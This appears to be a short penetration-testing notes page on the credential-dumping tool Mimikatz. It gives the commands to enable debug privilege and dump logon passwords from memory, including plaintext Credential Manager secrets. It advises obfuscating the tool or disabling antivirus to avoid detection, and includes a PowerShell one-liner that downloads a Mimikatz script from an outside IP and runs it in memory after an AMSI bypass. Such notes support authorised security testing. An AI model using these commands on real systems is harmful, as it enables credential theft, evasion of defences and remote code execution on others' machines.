Mimikatz

Overview

Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable or turning off AV is your best bet for using it

Running Mimikatz

Inside of an Administrator shell

mimikatz.exe
privilege::debug                - enables all other attacks
sekurlsa::logonPasswords        - can show plaintext passwords saved in credman

The credman passwords appear in clear text because when a network drive is mapped using the Connect using different credentials option, it is cached into credman as clear-text.

Mimikatz.ps1

Run in memory after amsi bypass

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')

PreviousGPP / cPassword Attacks Nextmisc

Last updated 1 year ago

Was this helpful?